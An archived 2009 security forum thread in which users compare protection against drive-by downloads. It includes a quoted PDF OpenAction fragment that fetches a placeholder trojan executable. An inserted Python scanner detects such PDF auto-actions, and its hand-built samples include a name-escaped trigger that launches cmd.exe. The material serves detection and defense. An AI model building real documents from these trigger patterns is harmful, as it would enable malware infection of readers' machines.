Anti-drive by software suggestion

Discussion in 'other anti-malware software' started by Boost, Jan 22, 2009.

Thread Status:
Not open for further replies.
  1. Boost

    Boost Registered Member

    Joined:
    Feb 2, 2007
    Posts:
    1,294
    Does Process Guard help with drive-by downloads?
     
  2. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Super Bowl stadium site hacked, seeded with exploits
    http://blogs.zdnet.com/security/?p=15
    Popular tennis websites struck in latest malware attack
    http://www.sophos.com/pressoffice/news/articles/2008/06/infected-tennis-sites.html
    Visitors to Sony PlayStation website at risk of malware infection
    http://www.sophos.com/pressoffice/news/articles/2008/07/playstation.html
    _____________________________________________________________________________

    "Drive-by downloads" hasn't been explicitly defined in this thread. The classic definition is the downloading of malware executables by remote code execution. If this is the case, then the answer is Yes.

    fcukdat, who has tested such exploits for me, says that nothing gets by Process Guard.

    aigle (supreme malware tester par excellence) also tested a number of different products in a test I set up last year using an IE exploit:

    http://www.urs2.net/rsj/computing/tests/remote

    Remember, that most drive-by downloads are targeted at IE {hint, hint}. Some exceptions are Flash and PDF exploits which can download malware, no matter the browser. A recent PDF exploit had this type of code:

    Code:
    ....<< /Type /OpenAction
    /S /URI
    /URI (http://www.some_site.com/some_trojan.exe)
    
    But this is no match for any of the products in the test. Easily blocked.

    As mentioned by others, there are ways of preventing the exploit from getting to the point of downloading the malware - disabling scripting, for example.

    But solutions such as those in the test are the barrier of last resort.

    ----
    rich
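The PDF fragment Rmus quotes is an automatic action: the viewer runs it when the file opens, with no click. The scanner below is an added example, not code from this thread or from any of the products mentioned, and shows how to detect that pattern statically: it finds every /OpenAction and /AA entry, follows one level of indirect reference, undoes #XX name escapes, and reports actions whose subtype is /URI, /Launch, /JavaScript, /SubmitForm or /GoToR. The three sample PDFs are hand-constructed and minimal (not valid for a real viewer); the host and file names are the placeholders from the post, not real sites or samples.

```python
import re
from typing import Dict, List, Optional
# Action subtypes that fetch, run or script something when the file opens.
RISKY_ACTIONS = {b"URI", b"Launch", b"JavaScript", b"SubmitForm", b"GoToR"}
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
REF_RE = re.compile(rb"^\s*(\d+)\s+\d+\s+R\s*$")
# Constructed samples (hand-written; host and file names are placeholders).
# 1) the pattern quoted in the post: the catalog's /OpenAction is a /URI action
SUSPICIOUS_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R
   /OpenAction << /S /URI /URI (http://www.some_site.com/some_trojan.exe) >> >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
%%EOF"""
# 2) same trigger via an indirect object, key name #-escaped to dodge grep
OBFUSCATED_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /Open#41ction 3 0 R >>
endobj
3 0 obj
<< /S /Launch /F (cmd.exe) >>
endobj
%%EOF"""
# 3) benign: /OpenAction is only a destination array (open at page, fit)
BENIGN_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction [3 0 R /Fit] >>
endobj
%%EOF"""

def _decode_names(data: bytes) -> bytes:
    """Undo #XX name escapes so /Open#41ction compares equal to /OpenAction."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)

def _objects(data: bytes) -> Dict[int, bytes]:
    """Object number -> raw body for every 'N G obj ... endobj' in the file.
    Objects packed into compressed object streams are not seen (inflate first)."""
    return {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(data)}

def _value_after(key: bytes, body: bytes) -> Optional[bytes]:
    """Raw value following /key: balanced << >> dict, [ ] array, ( ) string,
    indirect reference 'N G R' or /Name."""
    m = re.search(rb"/" + key + rb"\b\s*", body)
    if not m:
        return None
    rest = body[m.end():]
    if rest.startswith(b"<<"):
        depth = i = 0
        while i < len(rest):
            if rest.startswith(b"<<", i):
                depth, i = depth + 1, i + 2
            elif rest.startswith(b">>", i):
                depth, i = depth - 1, i + 2
                if depth == 0:
                    return rest[:i]
            else:
                i += 1
        return rest  # unterminated dictionary: take what is there
    m2 = re.match(rb"\[[^\]]*\]|\((?:\\.|[^\\)])*\)|\d+\s+\d+\s+R|/\S+", rest)
    return m2.group(0) if m2 else None

def _resolve(value: Optional[bytes], objs: Dict[int, bytes]) -> Optional[bytes]:
    """Follow one indirect reference (N G R) to the referenced object body."""
    if value is None:
        return None
    m = REF_RE.match(value)
    if not m:
        return value.strip()
    body = objs.get(int(m.group(1)))
    return body.strip() if body is not None else None

def find_auto_actions(pdf: bytes) -> List[dict]:
    """One finding per /OpenAction or /AA whose action subtype is in RISKY_ACTIONS."""
    objs = _objects(_decode_names(pdf))
    findings = []
    for num, body in objs.items():
        for trigger in (b"OpenAction", b"AA"):
            action = _resolve(_value_after(trigger, body), objs)
            # A destination array like [3 0 R /Fit] only scrolls; only an
            # action dictionary can fetch, launch or run script.
            if not action or not action.startswith(b"<<"):
                continue
            for s in re.finditer(rb"/S\s*/(\w+)", action):
                if s.group(1) not in RISKY_ACTIONS:
                    continue
                target = re.search(rb"/(?:URI|F|JS)\s*\(([^)]*)\)", action)
                findings.append({"object": num, "trigger": trigger.decode(),
                                 "action": s.group(1).decode(),
                                 "target": target.group(1).decode("latin-1") if target else None})
    return findings

if __name__ == "__main__":
    for name in ("SUSPICIOUS_PDF", "OBFUSCATED_PDF", "BENIGN_PDF"):
        print(name, find_auto_actions(globals()[name]))
```

Two caveats a practitioner would add. First, this is a byte-level scanner: real samples usually hide the catalog and action objects inside FlateDecode streams or object streams, so the file has to be decompressed (or parsed with a proper PDF library) before the regexes see anything. Second, detecting the action is the earlier layer Rmus mentions; the products in his test sit behind it and stop the downloaded executable from running even when the scanner has missed the document.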
     
  3. SpikeyB

    SpikeyB Registered Member

    Joined:
    Mar 20, 2005
    Posts:
    479
    Maybe I'm missing something. I don't understand how Antivirus 2008 could install and run at next boot on a machine that had a whitelist of allowed processes (when presumably Antivirus 2008 would not be on that whitelist). Perhaps you are talking about whitelisted websites, I'm not sure.
     
  4. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan
    Yes, I mean web sites. I was talking in context of WOT, browser defender and other such applications that were suggested by some users.
     
  5. AKAJohnDoe

    AKAJohnDoe Registered Member

    Joined:
    Sep 26, 2007
    Posts:
    989
    Location:
    127.0.0.1
    Also, even without the NoScript add-on extension, Firefox has security settings to prevent drive-by add-on installs.

    See how here
     
  6. andyman35

    andyman35 Registered Member

    Joined:
    Nov 2, 2007
    Posts:
    2,336
    Browser Defender performs real-time analysis of site content AFAIK, unlike WOT and similar static site rating tools.
     
  7. idbit

    idbit Registered Member

    Joined:
    Dec 9, 2008
    Posts:
    43
    Location:
    Florida
  8. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan
    http://www.browserdefender.com/
     
  9. raven211

    raven211 Registered Member

    Joined:
    May 4, 2005
    Posts:
    2,567
    Well is the whole OA seamless for a noob? I wouldn't think so, or it depends on which kind of "noob" we're talking about...
     
  10. GES/POR

    GES/POR Registered Member

    Joined:
    Nov 26, 2006
    Posts:
    1,490
    Location:
    Armacham
    Sounds interesting, so I tried it for a few hours. It slowed browsing down quite a bit and didn't let me access my webmail, so off it went. I can't stand apps fucking with my browsing. On the other hand, WOT hasn't caused these issues, but I passed on it for the reason you mentioned.
     
  11. firzen771

    firzen771 Registered Member

    Joined:
    Oct 29, 2007
    Posts:
    4,815
    Location:
    Canada
    Really? Hmm, my browsing speeds are still fast with Browser Defender :doubt:
     
  12. GES/POR

    GES/POR Registered Member

    Joined:
    Nov 26, 2006
    Posts:
    1,490
    Location:
    Armacham
    No joke. It could easily be a conflict from my end, maybe with Edge.
     
  13. progress

    progress Guest

    So this is the easiest exploit protection? :rolleyes:
     
  14. Kees1958

    Kees1958 Registered Member

    Joined:
    Jul 8, 2006
    Posts:
    5,857
    Or Chrome with its built-in sandbox.
     
  15. NormanF

    NormanF Registered Member

    Joined:
    Feb 20, 2009
    Posts:
    2,882
    GeSWall. If you run a browser in isolation, no drive-by malware can install. The reason is that no process can run outside the virtual environment unless you allow it to. And if it does get on the browser somehow, closing it kills the malware. DefenseWall performs a similar function.
     
  16. the Tester

    the Tester Registered Member

    Joined:
    Jul 28, 2002
    Posts:
    2,854
    Location:
    The Gateway to the Blue Hills,WI.
    Does Browser Defender work with Opera?
    If not, any similar freeware that works with Opera?
     
    Last edited: Feb 21, 2009
  17. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    11,126
    Location:
    U.S.A. (South)
    Just to add to Rmus's list of so-called common sites that were hacked: CNN News was exploited shortly after the College Playoffs, when Atlanta was hit by a tornado that night. I went to the CNN site to try to see what they had to report on, and an exploit went berserk on my IE and forced a manual shutdown. Repeated attempts that evening yielded the same results, so any widely popular server, covered or not, can be poked into and present a problem at any given time.

    I had Process Guard & EQS out of service at the time, and that's all it took.

    It happens.
     